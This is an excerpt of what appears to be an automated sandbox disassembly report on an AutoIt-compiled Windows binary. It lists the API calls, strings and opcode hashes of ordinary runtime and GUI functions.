                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$DestroyMove
                                                                                                                                                                                          • String ID: static
                                                                                                                                                                                          • API String ID: 2139405536-2160076837
                                                                                                                                                                                          • Opcode ID: cd537348c44005192ab0dcec1e781a1c59980dbd05a4f85d3d64ce90fb252cf5
                                                                                                                                                                                          • Instruction ID: 30211bc91ba4bdc2e89bb12fc3ac030a3ebf2bb1eee085881fdb643a6c1f29ff
                                                                                                                                                                                          • Opcode Fuzzy Hash: cd537348c44005192ab0dcec1e781a1c59980dbd05a4f85d3d64ce90fb252cf5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 23319E71150604AADB24DF68CC94FFB77A9FF48724F00861DF9A587190DA79AC81CB60
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 007C50BD
                                                                                                                                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007C50D2
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                          • String ID: '
                                                                                                                                                                                          • API String ID: 3850602802-1997036262
                                                                                                                                                                                          • Opcode ID: 3136aba693b3932512540fa8c049ede5e1f7ae0f563f2616eb280282af86f1e1
                                                                                                                                                                                          • Instruction ID: 0502bb073ae0594679e43d6e256d785616de5d848a2e6299085d4db9bc271be2
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3136aba693b3932512540fa8c049ede5e1f7ae0f563f2616eb280282af86f1e1
                                                                                                                                                                                          • Instruction Fuzzy Hash: F631F474A0160A9FDB14CF69C980FDABBB5BB49300F10406EE904EB351D776A985CF90
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 007C3D18
                                                                                                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007C3D23
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                          • String ID: Combobox
                                                                                                                                                                                          • API String ID: 3850602802-2096851135
                                                                                                                                                                                          • Opcode ID: 37edff5a2d6f28eddc20d2b32546491df7613220817316619958e0db9067d11e
                                                                                                                                                                                          • Instruction ID: e7b60751cd46f832fff6a53f27ce13a1b2eddfe1a75a2bfffa868bd5f9da7da4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 37edff5a2d6f28eddc20d2b32546491df7613220817316619958e0db9067d11e
                                                                                                                                                                                          • Instruction Fuzzy Hash: B811B671700208AFEF218F54DC84FFB3B6AEB843A4F10812CF91597290D6799D5187A0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00737873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 007378B1
                                                                                                                                                                                            • Part of subcall function 00737873: GetStockObject.GDI32(00000011), ref: 007378C5
                                                                                                                                                                                            • Part of subcall function 00737873: SendMessageW.USER32(00000000,00000030,00000000), ref: 007378CF
                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 007C4216
                                                                                                                                                                                          • GetSysColor.USER32(00000012), ref: 007C4230
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                                          • String ID: static
                                                                                                                                                                                          • API String ID: 1983116058-2160076837
                                                                                                                                                                                          • Opcode ID: fa60c8674f469c68ee7dd3700e3e7236443e61f8a239431dd851a55a25d335f4
                                                                                                                                                                                          • Instruction ID: 29b0248812590969961913c0d45dac918c00ca7543dbc44a934f2c8812e516b3
                                                                                                                                                                                          • Opcode Fuzzy Hash: fa60c8674f469c68ee7dd3700e3e7236443e61f8a239431dd851a55a25d335f4
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3311F6B2610209AFDB11DFA8CC4AEEA7BA8FB08354F015528F955E3250D679E851DB60
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0073B329: _wcslen.LIBCMT ref: 0073B333
                                                                                                                                                                                          • CharUpperBuffW.USER32(?,?,?), ref: 0079761D
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00797629
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                          • String ID: STOP
                                                                                                                                                                                          • API String ID: 1256254125-2411985666
                                                                                                                                                                                          • Opcode ID: 391a389b367b62da96186ae6c90f349e4cd207b169b37eceaeb4a9ff10b8c053
                                                                                                                                                                                          • Instruction ID: 7ae1ea19e6fc1a2e07ca41d8bbc0ba6a72b8af7b7b3ff815f10756a9d2d6f2a3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 391a389b367b62da96186ae6c90f349e4cd207b169b37eceaeb4a9ff10b8c053
                                                                                                                                                                                          • Instruction Fuzzy Hash: A701C032A24A2A8BCF24AEBDEC449BF77B5BB60750B400528E42196291EB39D900C750
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0073B329: _wcslen.LIBCMT ref: 0073B333
                                                                                                                                                                                            • Part of subcall function 007945FD: GetClassNameW.USER32(?,?,000000FF), ref: 00794620
                                                                                                                                                                                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00792699
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                                          • API String ID: 624084870-1403004172
                                                                                                                                                                                          • Opcode ID: a8fcd969dd8bfe1c6cf0bb1d6ee3ed7032c8a8b06253a848ce9fbe12ea70f2fa
                                                                                                                                                                                          • Instruction ID: 258526f53d2be567ecff60bf7d566244f48efc34f99f08b37f37a62b99fafbf0
                                                                                                                                                                                          • Opcode Fuzzy Hash: a8fcd969dd8bfe1c6cf0bb1d6ee3ed7032c8a8b06253a848ce9fbe12ea70f2fa
                                                                                                                                                                                          • Instruction Fuzzy Hash: F801D4B5610228FBDF04FBA4DC59DFE77A8EF46360F100619B932977C2DA39580AC650
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0073B329: _wcslen.LIBCMT ref: 0073B333
                                                                                                                                                                                            • Part of subcall function 007945FD: GetClassNameW.USER32(?,?,000000FF), ref: 00794620
                                                                                                                                                                                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 00792593
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                                          • API String ID: 624084870-1403004172
                                                                                                                                                                                          • Opcode ID: 4b5b3478b41d799e93a93b05f3b1f0a0ff44632933081db92a503e9e4c948c69
                                                                                                                                                                                          • Instruction ID: 4abdcb2e5a5cedd0ddd21f2a49ef7f6d414eb9da07a47edda71ddc26cfb6d257
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4b5b3478b41d799e93a93b05f3b1f0a0ff44632933081db92a503e9e4c948c69
                                                                                                                                                                                          • Instruction Fuzzy Hash: C901A7B5650108BBDF04F7A0D966EFE77A8DF45340F5000697902A7282DA289E19C6B1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0073B329: _wcslen.LIBCMT ref: 0073B333
                                                                                                                                                                                            • Part of subcall function 007945FD: GetClassNameW.USER32(?,?,000000FF), ref: 00794620
                                                                                                                                                                                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 00792615
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                                          • API String ID: 624084870-1403004172
                                                                                                                                                                                          • Opcode ID: a480156164991a20309032cfa36bd7521a7958f54530af76c729d6ba54b4be7d
                                                                                                                                                                                          • Instruction ID: 2505e7ca0a619cc6673097aef1124fb0e2344b0a31a1e255964774bd9f54ed5c
                                                                                                                                                                                          • Opcode Fuzzy Hash: a480156164991a20309032cfa36bd7521a7958f54530af76c729d6ba54b4be7d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3401A2B5A40108B6DF15F7A0E906EFE77A8DB05340F500029B902E3683DA699E0A96B2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0073B329: _wcslen.LIBCMT ref: 0073B333
                                                                                                                                                                                            • Part of subcall function 007945FD: GetClassNameW.USER32(?,?,000000FF), ref: 00794620
                                                                                                                                                                                          • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00792720
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                                          • API String ID: 624084870-1403004172
                                                                                                                                                                                          • Opcode ID: 91a8e79a52420ec6c78efb6eb51e9c7446a8780a8e603e234d5bb9be87f82e27
                                                                                                                                                                                          • Instruction ID: b44a2a85755105e95a4bf76bbb8b2f4aed2943b235ff9bab699469c66f0f5417
                                                                                                                                                                                          • Opcode Fuzzy Hash: 91a8e79a52420ec6c78efb6eb51e9c7446a8780a8e603e234d5bb9be87f82e27
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4DF0F4B5B40218B6DF04F3A4DC4AFFE73A8EF01350F400919B622B32C3DB7958098260
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: 2<v$j3}
                                                                                                                                                                                          • API String ID: 0-393586578
                                                                                                                                                                                          • Opcode ID: bda89111487bd55c930077d1522e98c81c19dc9920facabb93126faf6cf8faa5
                                                                                                                                                                                          • Instruction ID: 4f0711d008c05bd4907d265842a45098b74cd5ff1b71a06fe1cc403411512c25
                                                                                                                                                                                          • Opcode Fuzzy Hash: bda89111487bd55c930077d1522e98c81c19dc9920facabb93126faf6cf8faa5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 01F09029114149AADB149BD1C840AB973B8DF04701F10816ABCCBC7290EA788F91E369
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0079146F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Message
                                                                                                                                                                                          • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                          • API String ID: 2030045667-4017498283
                                                                                                                                                                                          • Opcode ID: 8f59e97895347da708fa1fa76f97bf1fe397f6724e81388e9c9d40f2a598062a
                                                                                                                                                                                          • Instruction ID: 6247353a41ad2af55de4ada40e57e5cf7e4f2e361192d3eee5070158256aae57
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f59e97895347da708fa1fa76f97bf1fe397f6724e81388e9c9d40f2a598062a
                                                                                                                                                                                          • Instruction Fuzzy Hash: EBE04871244B1D7AD6342794BC0BFD977848F05B96F11443EFB88655C34EFE685042DA
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0074FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,007510E2,?,?,?,0073100A), ref: 0074FAD9
                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,0073100A), ref: 007510E6
                                                                                                                                                                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0073100A), ref: 007510F5
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 007510F0
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                                                                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                          • API String ID: 55579361-631824599
                                                                                                                                                                                          • Opcode ID: a50b31d0566e60867cd4cdf92ca9d3d9306ad3dd589b6f5331d529d34c0a176f
                                                                                                                                                                                          • Instruction ID: bdfc6bebfebd4c327e09e452dc33412954d08cd60f8bd85bdbd21f34b4c93600
                                                                                                                                                                                          • Opcode Fuzzy Hash: a50b31d0566e60867cd4cdf92ca9d3d9306ad3dd589b6f5331d529d34c0a176f
                                                                                                                                                                                          • Instruction Fuzzy Hash: D2E06D706007108BD330AF34D948782BBF4BB00302F00896DE885C2391DBFCE848CB91
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 007A39F0
                                                                                                                                                                                          • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 007A3A05
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Temp$FileNamePath
                                                                                                                                                                                          • String ID: aut
                                                                                                                                                                                          • API String ID: 3285503233-3010740371
                                                                                                                                                                                          • Opcode ID: 2165c160234e915af024bb6ed644289dadcdb9d19f15b1845bd9f63ee0eb5f2f
                                                                                                                                                                                          • Instruction ID: 799e3e40907e40a81a422202405385c01e1b05ee25da2b07f375ce342e9c3352
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2165c160234e915af024bb6ed644289dadcdb9d19f15b1845bd9f63ee0eb5f2f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 78D05EB2500328A7DA30A7689C0EFDB7B6CEB44710F0002A5BA5592091DAB8DA85CBD4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007C2E08
                                                                                                                                                                                          • PostMessageW.USER32(00000000), ref: 007C2E0F
                                                                                                                                                                                            • Part of subcall function 0079F292: Sleep.KERNEL32 ref: 0079F30A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                          • String ID: Shell_TrayWnd
                                                                                                                                                                                          • API String ID: 529655941-2988720461
                                                                                                                                                                                          • Opcode ID: a314854f6649d7daf62cb5e365df6c9cdcc7c9545b7948207ef5523dff2f7b79
                                                                                                                                                                                          • Instruction ID: ec2758c5c18002767cab778f690c185e61893b81fbe4b68ba37d24e1192bfc45
                                                                                                                                                                                          • Opcode Fuzzy Hash: a314854f6649d7daf62cb5e365df6c9cdcc7c9545b7948207ef5523dff2f7b79
                                                                                                                                                                                          • Instruction Fuzzy Hash: C8D0A931381300AAE678B330AC0FFD66B10AB04B00F108838B305EA1C0C8A86800C658
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007C2DC8
                                                                                                                                                                                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 007C2DDB
                                                                                                                                                                                            • Part of subcall function 0079F292: Sleep.KERNEL32 ref: 0079F30A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
